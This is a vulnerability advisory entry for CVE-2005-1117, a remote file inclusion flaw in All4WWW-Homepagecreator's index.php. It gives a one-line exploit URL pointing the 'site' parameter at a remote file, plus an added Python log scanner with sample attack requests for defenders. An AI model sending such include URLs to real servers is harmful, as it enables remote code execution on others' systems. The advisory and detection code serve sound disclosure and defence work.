All4WWW-HomePageCreator index.php Remote Arbitrary File Inclusion Vulnerability

Vulnerability ID: 1108674
Vulnerability Type: Input Validation
Published: 2005-04-14
Updated: 2006-09-28
CVE ID: CVE-2005-1117
CNNVD-ID: CNNVD-200505-496
Platform: PHP
CVSS Score: 7.5
|Vulnerability Source
https://www.exploit-db.com/exploits/25422
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-496
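|Vulnerability Details
All4WWW-Homepagecreator is a script that automatically generates web pages. All4WWW-Homepagecreator is affected by a remote arbitrary file inclusion vulnerability, caused by the application failing to properly sanitize user-supplied input before using it in an include() function call.
|Vulnerability Exploit (EXP)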
source: http://www.securityfocus.com/bid/13169/info

All4WWW-Homepagecreator is affected by an arbitrary remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an 'include()' function call.

An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. 

http://www.example.com/index.php?site=http://www.example.com/some-file
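
For defenders reviewing web server logs, the following added example (not part of the original advisory or of the All4WWW-Homepagecreator code) flags requests to index.php whose `site` parameter resolves, after repeated percent-decoding, to a URL scheme, stream wrapper, or network path instead of a local page name. It assumes Apache/nginx combined-format access logs; the log lines and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# A leading scheme/wrapper ("http:", "ftp:", "php:", "data:"), "//", or a UNC
# prefix means include() would be pointed at something other than a local page.
REMOTE_RE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:|//|\\\\)", re.I)
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding (e.g. %252F) up to max_rounds times."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_site_values(log_line, param="site"):
    """Return decoded `param` values in an index.php request that look non-local."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    target = urlsplit(m.group(1))
    if not target.path.endswith("index.php"):
        return []
    hits = []
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        if name == param:
            value = fully_decode(value)  # parse_qsl already decoded one layer
            if REMOTE_RE.match(value):
                hits.append(value)
    return hits

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Apr/2005:10:00:01 +0000] "GET /index.php?site=home HTTP/1.1" 200 5120',
    '192.0.2.44 - - [14/Apr/2005:10:02:17 +0000] "GET /index.php?site=http://www.example.com/some-file HTTP/1.1" 200 312',
    '192.0.2.44 - - [14/Apr/2005:10:02:19 +0000] "GET /index.php?site=%2568ttp%253A%252F%252Fwww.example.com%252Fsome-file HTTP/1.0" 200 312',
    '192.0.2.77 - - [14/Apr/2005:10:05:40 +0000] "GET /about.php?site=http://www.example.com/x HTTP/1.1" 404 210',
]

def scan(lines):
    """Return (line_number, decoded_value) for every suspicious request."""
    return [(n, v) for n, line in enumerate(lines, 1) for v in suspicious_site_values(line)]

if __name__ == "__main__":
    for n, v in scan(SAMPLE_LOG):
        print(f"line {n}: site -> {v}")
```

A hit only shows that such a request was made; whether the include succeeded depends on the server's PHP configuration and the application version.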
|References

Source: BID
Name: 13169
Link: http://www.securityfocus.com/bid/13169
Source: SECUNIA
Name: 14972
Link: http://secunia.com/advisories/14972
Source: BUGTRAQ
Name: 20050414All4WWW-HomepagecreatorRemoteCommandExecution
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=111350434925520&w=2